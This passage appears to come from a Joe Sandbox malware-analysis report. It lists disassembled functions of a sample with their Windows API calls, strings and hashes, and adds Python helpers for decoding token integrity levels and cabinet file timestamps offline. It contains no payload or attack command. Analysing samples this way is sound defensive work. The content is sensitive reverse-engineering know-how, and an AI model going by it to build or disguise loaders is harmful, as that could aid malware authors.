                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                              • API String ID: 3535843008-3890505273
                                                                                                                                                              • Opcode ID: f3a832b1648872e7e934bff56bdf313c60229877d1dac77ea184e765aa48415a
                                                                                                                                                              • Instruction ID: fc5cefcb669ea786b20630667334dd47aef5ca31774a235456fbd4ad1cbb0a6a
                                                                                                                                                              • Opcode Fuzzy Hash: f3a832b1648872e7e934bff56bdf313c60229877d1dac77ea184e765aa48415a
                                                                                                                                                              • Instruction Fuzzy Hash: 8241387590021DFFCB21DFA8E981BA9BBB4FB04350F158176ED10BBA90C371AE459B80
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32 ref: 5BB31342
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 5BB31357
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 5BB31363
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00000104), ref: 5BB31377
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 5BB313E9
                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 5BB313FF
                                                                                                                                                              • Sleep.KERNELBASE ref: 5BB31407
                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 5BB3140C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$ModuleProcess$CreateExitFileHandleNameSleep
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1148150840-0
                                                                                                                                                              • Opcode ID: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
                                                                                                                                                              • Instruction ID: 29308b35581844d5fbda9ce5f776adae6960d5a29273f979bf2b02e5f9c33764
                                                                                                                                                              • Opcode Fuzzy Hash: f0dd7a59c0bd5b43b3f9e5f35ad75e2b2e8d3d451f964b30678343650819a50a
                                                                                                                                                              • Instruction Fuzzy Hash: C521A172504314AFE712ABA4CC44AABBBEDFF48344F10442CF181A3590FBF6A844D792
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00A6B5FC,00000000,?,?,?,00A14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00A054FA,?), ref: 00A40533
                                                                                                                                                              • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00A6B5F4,?,00A14207,00000000,Setup), ref: 00A405D7
                                                                                                                                                              • GetLastError.KERNEL32(?,00A14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00A054FA,?,?,?), ref: 00A405E7
                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00A14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00A054FA,?), ref: 00A40621
                                                                                                                                                                • Part of subcall function 00A02DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00A02F09
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00A6B5FC,?,?,00A6B5F4,?,00A14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00A054FA,?), ref: 00A4067A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                              • String ID: logutil.cpp
                                                                                                                                                              • API String ID: 4111229724-3545173039
                                                                                                                                                              • Opcode ID: ef59131f7a24e23c72681f4a2f66c6077aa1db6ddb9477dd624659a6152c1b2a
                                                                                                                                                              • Instruction ID: e40c54c24f73ee64d01c60049733ddc50ac096daf0e3179c5d5aee9709d65225
                                                                                                                                                              • Opcode Fuzzy Hash: ef59131f7a24e23c72681f4a2f66c6077aa1db6ddb9477dd624659a6152c1b2a
                                                                                                                                                              • Instruction Fuzzy Hash: 4A31C839910219FFDB11AFA5DE45E9ABA7DEB80B50F024524FB02E7160D7B1CD50AFA0
APIs
• VariantInit.OLEAUT32(?), ref: 00A43309
• SysAllocString.OLEAUT32(?), ref: 00A43325
• VariantClear.OLEAUT32(?), ref: 00A433AC
• SysFreeString.OLEAUT32(00000000), ref: 00A433B7
Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: StringVariant$AllocClearFreeInit
• String ID: `<u$xmlutil.cpp
• API String ID: 760788290-3482516102
• Opcode ID: f192116240ddaad6ba5d53f070748c7df720eba12b2298984c63abee3fca1743
• Instruction ID: a324c267dfbd0401520582efa8a7fef3e2363528adfaca3e723c76536d02826e
• Opcode Fuzzy Hash: f192116240ddaad6ba5d53f070748c7df720eba12b2298984c63abee3fca1743
• Instruction Fuzzy Hash: F021943A901219AFCF11DF95C848EAE7BB9AFC5711F154158F901AF250CB71EE018B90
APIs
Strings
• Failed to write during cabinet extraction., xrefs: 00A20C35
• cabextract.cpp, xrefs: 00A20C2B
• Unexpected call to CabWrite()., xrefs: 00A20BC1
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: ErrorFileLastWrite_memcpy_s
• String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
• API String ID: 1970631241-3111339858
• Opcode ID: cd44277640149b1e677380b7ecd4395c8e8e5d1307a15f6c4b877d5b95543ccb
• Instruction ID: 89ac8ac6fe46f387fc86dbaae35a68b93ee8c6286ea61c0f777fcb3818f61fa5
• Opcode Fuzzy Hash: cd44277640149b1e677380b7ecd4395c8e8e5d1307a15f6c4b877d5b95543ccb
• Instruction Fuzzy Hash: D621D1BB600215ABCB10DFACE985D5A7BB8FF85321B214269FE04D7246E672DD00CB60
APIs
• OpenProcessToken.ADVAPI32(?,00000008,?,00A053BD,00000000,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A40897
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A408A1
• GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A408D3
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A408EC
• CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A4092B
Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: ErrorLastToken$CloseHandleInformationOpenProcess
• String ID: procutil.cpp
• API String ID: 4040495316-1178289305
• Opcode ID: d483f404c98bda605574549d0c6796a1ecb2ed4c9ad41e0a413acec84117374f
• Instruction ID: f0a569b2fb0d17d18e6831b00f0436f273013f6d0c10af56840c88dbd2b29555
• Opcode Fuzzy Hash: d483f404c98bda605574549d0c6796a1ecb2ed4c9ad41e0a413acec84117374f
• Instruction Fuzzy Hash: 4921D43AD00229EFEB20DB999905E9EBBB8EFD0711F014056AE55EB251D3708E00EAD0
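The call sequence above (OpenProcessToken with desired access 00000008, i.e. TOKEN_QUERY, then GetTokenInformation with class 00000014, TokenIntegrityLevel, then CloseHandle) reads a token's mandatory integrity label. The buffer GetTokenInformation fills is a TOKEN_MANDATORY_LABEL whose SID has the form S-1-16-<RID>, and the RID is the integrity level (0x1000 Low, 0x2000 Medium, 0x3000 High, 0x4000 System). The report records the call but not the label it returned. The following Python is an added example, not code from the report or from the sample: it decodes such a SID offline from constructed bytes, so an analyst can turn a dumped TOKEN_MANDATORY_LABEL into a level name without running the sample. The byte strings and helper names are assumptions for illustration.

```python
import struct

SECURITY_MANDATORY_LABEL_AUTHORITY = 16   # S-1-16-* SIDs carry integrity levels

# Well-known mandatory-label RIDs (the last sub-authority of the S-1-16-* SID).
INTEGRITY_RIDS = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x2100: "Medium Plus",
    0x3000: "High",
    0x4000: "System",
    0x5000: "Protected Process",
}


def parse_sid(blob: bytes) -> str:
    """Decode a binary SID: revision (1 byte), sub-authority count (1 byte),
    48-bit big-endian identifier authority, then `count` little-endian
    uint32 sub-authorities. Returns the textual S-1-... form."""
    if len(blob) < 8:
        raise ValueError("SID header truncated")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(blob) < 8 + 4 * count:
        raise ValueError("SID sub-authorities truncated")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", blob, 8)
    return "-".join(str(x) for x in ("S", revision, authority, *subs))


def integrity_level(label_sid: bytes) -> tuple:
    """Interpret the SID behind TOKEN_MANDATORY_LABEL.Label.Sid, as returned by
    GetTokenInformation(TokenIntegrityLevel): the last sub-authority is the
    integrity RID. Returns (rid, level name)."""
    parts = parse_sid(label_sid).split("-")
    if int(parts[2]) != SECURITY_MANDATORY_LABEL_AUTHORITY or len(parts) < 4:
        raise ValueError("not a mandatory-label SID: " + "-".join(parts))
    rid = int(parts[-1])
    if rid in INTEGRITY_RIDS:
        return rid, INTEGRITY_RIDS[rid]
    # Windows compares levels numerically, so an unknown RID is classified by
    # the highest well-known level at or below it.
    floor = max(k for k in INTEGRITY_RIDS if k <= rid)
    return rid, INTEGRITY_RIDS[floor] + " or above"


def is_high_or_above(label_sid: bytes) -> bool:
    """The question an elevation check asks of this label: High (0x3000) or higher?"""
    return integrity_level(label_sid)[0] >= 0x3000


def label_sid_for_rid(rid: int) -> bytes:
    """Build a constructed S-1-16-<rid> SID blob (for offline tests)."""
    return bytes([1, 1]) + (SECURITY_MANDATORY_LABEL_AUTHORITY).to_bytes(6, "big") + struct.pack("<I", rid)


# Constructed sample: the raw bytes of S-1-16-12288 (High), laid out as they
# would sit behind TOKEN_MANDATORY_LABEL.Label.Sid in the returned buffer.
HIGH_LABEL_SID = bytes.fromhex("01 01 000000000010 00300000")


if __name__ == "__main__":
    rid, name = integrity_level(HIGH_LABEL_SID)
    print(parse_sid(HIGH_LABEL_SID), hex(rid), name, is_high_or_above(HIGH_LABEL_SID))
```

To use this on a real dump, copy the SID bytes that TOKEN_MANDATORY_LABEL.Label.Sid points to (not the structure's own 8 bytes, which hold the pointer and the attributes) and pass them to integrity_level.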
APIs
• DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A20CC4
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A20CD6
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00A20CE9
• CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00A208B1,?,?), ref: 00A20CF8
Strings
• cabextract.cpp, xrefs: 00A20C93
• Invalid operation for this state., xrefs: 00A20C9D
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: Time$File$CloseDateHandleLocal
• String ID: Invalid operation for this state.$cabextract.cpp
• API String ID: 609741386-1751360545
• Opcode ID: 81563f1f703e9130460080b439973b924acc982b7ebad4c5860288fd79e1a6ff
• Instruction ID: bd97c2f132aea316c12272c6bb1db98e8e3ccc52e0b904eaaf7cf2728bfd2ebb
• Opcode Fuzzy Hash: 81563f1f703e9130460080b439973b924acc982b7ebad4c5860288fd79e1a6ff
• Instruction Fuzzy Hash: 5E21D172811229AB8B10DFACE909DFA7BBCFF443207108226F854D6591D371E911CB90
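The sequence above (DosDateTimeToFileTime, LocalFileTimeToFileTime, SetFileTime, CloseHandle) stamps an extracted cabinet member with the date/time stored in the cabinet entry: the 16-bit DOS date/time pair is expanded to a FILETIME, interpreted as local time and shifted to UTC by the extracting machine's time-zone bias, then written onto the file. For a timeline this means the timestamps on files dropped through this path reflect the cabinet's stored stamps, at 2-second resolution, not the moment of extraction. The following Python is an added example, not code from the report or from the sample: it reproduces that conversion offline. The DOS values, the time-zone offset and the function names are constructed for illustration; the report does not state the sandbox's time zone.

```python
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def dos_to_datetime(dos_date: int, dos_time: int) -> datetime:
    """Unpack a 16-bit DOS date and 16-bit DOS time (the form stored in a
    cabinet entry) into a naive datetime in the zone the stamp was written in.
    Date: bits 0-4 day, 5-8 month, 9-15 years since 1980.
    Time: bits 0-4 seconds/2, 5-10 minutes, 11-15 hours."""
    day = dos_date & 0x1F
    month = (dos_date >> 5) & 0x0F
    year = 1980 + (dos_date >> 9)
    second = (dos_time & 0x1F) * 2          # DOS keeps seconds/2, so always even
    minute = (dos_time >> 5) & 0x3F
    hour = dos_time >> 11
    return datetime(year, month, day, hour, minute, second)


def datetime_to_dos(dt: datetime) -> tuple:
    """Pack a datetime into the DOS pair. Odd seconds are truncated, so a
    round trip can lose one second; years before 1980 cannot be represented."""
    if dt.year < 1980:
        raise ValueError("DOS dates start at 1980")
    dos_date = ((dt.year - 1980) << 9) | (dt.month << 5) | dt.day
    dos_time = (dt.hour << 11) | (dt.minute << 5) | (dt.second // 2)
    return dos_date, dos_time


def datetime_to_filetime(dt: datetime) -> int:
    """Aware datetime -> FILETIME (100 ns ticks since 1601-01-01 UTC), using
    integer arithmetic so large tick counts are exact."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME -> aware UTC datetime (the value an analyst reads back from $STANDARD_INFORMATION)."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def dos_to_filetime(dos_date: int, dos_time: int, utc_offset_minutes: int) -> int:
    """Replicate DosDateTimeToFileTime followed by LocalFileTimeToFileTime: the
    DOS stamp is read as local time in the extracting machine's zone (assumed
    here as an explicit offset) and converted to the UTC FILETIME that
    SetFileTime then writes onto the extracted file."""
    local_zone = timezone(timedelta(minutes=utc_offset_minutes))
    local = dos_to_datetime(dos_date, dos_time).replace(tzinfo=local_zone)
    return datetime_to_filetime(local)


if __name__ == "__main__":
    # Constructed cabinet stamp: 2024-01-15 10:30:20 local, i.e. (0x582F, 0x53CA).
    for offset in (0, 60):
        ft = dos_to_filetime(0x582F, 0x53CA, utc_offset_minutes=offset)
        print(f"UTC{offset:+d}min -> FILETIME {ft} = {filetime_to_datetime(ft).isoformat()}")
```

The two offsets in the usage block show the practical caveat: the same cabinet entry yields a different on-disk timestamp depending on the time zone of the machine that extracted it, so when correlating dropped-file times across analysis hosts the zone bias has to be subtracted first.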
APIs
• CoInitialize.OLE32(00000000), ref: 00A43574
• InterlockedIncrement.KERNEL32(00A6B6C8), ref: 00A43591
• CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00A6B6B8,?,?,?,?,?,?), ref: 00A435AC
• CLSIDFromProgID.OLE32(MSXML.DOMDocument,00A6B6B8,?,?,?,?,?,?), ref: 00A435B8
Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: FromProg$IncrementInitializeInterlocked
• String ID: MSXML.DOMDocument$Msxml2.DOMDocument
• API String ID: 2109125048-2356320334
• Opcode ID: 37ec4e6f63fea923d91bcf993856129593a74804620c1fb5927951e54a48c731
• Instruction ID: 31d6319379ec086517cbe9f8f023f6f5cface0ac45da66bbf8ae353b5edcccb1
• Opcode Fuzzy Hash: 37ec4e6f63fea923d91bcf993856129593a74804620c1fb5927951e54a48c731
• Instruction Fuzzy Hash: 93F0E53E750125AFCB219BEAFD08B472E79EBC1B55F000829E800C6064D3B0D98286B2
APIs
• GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00A44A9D
• GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00A44ACA
• GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00A44AF6
• GetLastError.KERNEL32(00000000,00A4B7A0,?,00000000,?,00000000,?,00000000), ref: 00A44B34
• GlobalFree.KERNEL32(00000000), ref: 00A44B65
Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: ErrorLast$Global$AllocFree
• String ID: fileutil.cpp
• API String ID: 1145190524-2967768451
• Opcode ID: 025090bc2379e5ecbc6c30c05e5032b71f0b94f79120d59b16ed48e8d0260cb6
• Instruction ID: ce5d446784fd2f9bc9f7e9d9c375a6ca18f6561a87ad6097727904f629311e4e
• Opcode Fuzzy Hash: 025090bc2379e5ecbc6c30c05e5032b71f0b94f79120d59b16ed48e8d0260cb6
• Instruction Fuzzy Hash: 0131813F940229ABD712DB998C41FAFBAB8EFC8790F114165ED14E7241D730DD0186E4
APIs
• DefWindowProcW.USER32(?,00000082,?,?), ref: 00A1E985
• SetWindowLongW.USER32(?,000000EB,00000000), ref: 00A1E994
• SetWindowLongW.USER32(?,000000EB,?), ref: 00A1E9A8
• DefWindowProcW.USER32(?,?,?,?), ref: 00A1E9B8
• GetWindowLongW.USER32(?,000000EB), ref: 00A1E9D2
• PostQuitMessage.USER32(00000000), ref: 00A1EA31
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: Window$Long$Proc$MessagePostQuit
• String ID:
• API String ID: 3812958022-0
• Opcode ID: c4556cf20f0300410d9522dfb46e717669c17435280a074f33d02eb9fd1cab82
• Instruction ID: b1df42cd84cf12ff627d907927a614f61fa5738f9997d9fd1d81c230dfaa463f
• Opcode Fuzzy Hash: c4556cf20f0300410d9522dfb46e717669c17435280a074f33d02eb9fd1cab82
• Instruction Fuzzy Hash: D821C13A104118FFDF11DFA8DC08EAA3B69FF85351F144618F9069A1A4C732EDA0DB60
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00A20B27
• GetLastError.KERNEL32(?,?,?), ref: 00A20B31
Strings
• cabextract.cpp, xrefs: 00A20B55
• Failed to move file pointer 0x%x bytes., xrefs: 00A20B62
• Invalid seek type., xrefs: 00A20ABD
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
• API String ID: 2976181284-417918914
• Opcode ID: 8330ec25905e4301f1480f22115bc3499dc57a46ba464f34fe1d84f6d962d332
• Instruction ID: 1786eaeb0c5b7cc863999292162c2e3ac707de92c194567ac7274bbc3d6d0da8
• Opcode Fuzzy Hash: 8330ec25905e4301f1480f22115bc3499dc57a46ba464f34fe1d84f6d962d332
• Instruction Fuzzy Hash: A631A376A4022AFFCB10DFACE845DAEB779FB04764B148225FD1497652D370ED108B90
APIs
• CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00A1A0E8,00000000,00000000,?,00000000,00A053BD,00000000,?,?,00A0D5B5,?), ref: 00A04123
• GetLastError.KERNEL32(?,00A1A0E8,00000000,00000000,?,00000000,00A053BD,00000000,?,?,00A0D5B5,?,00000000,00000000), ref: 00A04131
• CreateDirectoryW.KERNEL32(?,840F01E8,00A05489,?,00A1A0E8,00000000,00000000,?,00000000,00A053BD,00000000,?,?,00A0D5B5,?,00000000), ref: 00A0419A
• GetLastError.KERNEL32(?,00A1A0E8,00000000,00000000,?,00000000,00A053BD,00000000,?,?,00A0D5B5,?,00000000,00000000), ref: 00A041A4
Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: dirutil.cpp
• API String ID: 1375471231-2193988115
• Opcode ID: 262b6df00af95ddb0f2b50000135d276926fbb224a7d4656373330163b74ea06
• Instruction ID: 8065d1a57d548572898b9bfd94c7aec58b3e81a004ed2c79e60b28e5451d42b2
• Opcode Fuzzy Hash: 262b6df00af95ddb0f2b50000135d276926fbb224a7d4656373330163b74ea06
• Instruction Fuzzy Hash: 0411C3BA60073DA6D7315BA57C44B3BA664FFB9B61F114221FF09AA1D0E3608C8192D1
APIs
  • Part of subcall function 00A40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A6AAA0,00000000,?,00A457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00A40F80
• RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00A13FB5,feclient.dll,?,00000000,?,?,?,00A04B12), ref: 00A13B42
  • Part of subcall function 00A410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A4112B
  • Part of subcall function 00A410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00A41163
Strings
Memory Dump Source
• Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
• API String ID: 1586453840-3596319545
• Opcode ID: 76e449974f7f820e7f6e997cd234b2f34e1bba09045bb790689345c3ff7d5470
• Instruction ID: e616b04bc363c6e9e75dcd1742da84e8ff4177e739cdc25a98d4d207896d1b09
• Opcode Fuzzy Hash: 76e449974f7f820e7f6e997cd234b2f34e1bba09045bb790689345c3ff7d5470
• Instruction Fuzzy Hash: 3D118E37A48208BBDF21DF95DD82EEABBB8EB50741F4040A5E601AB091E6719FC1D610
APIs
• lstrlenA.KERNEL32(00A1E93B,00000000,00000000,?,?,?,00A40013,00A1E93B,00A1E93B,?,00000000,0000FDE9,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A40776
• WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00A40013,00A1E93B,00A1E93B,?,00000000,0000FDE9,?,00A1E93B,8000FFFF), ref: 00A407B2
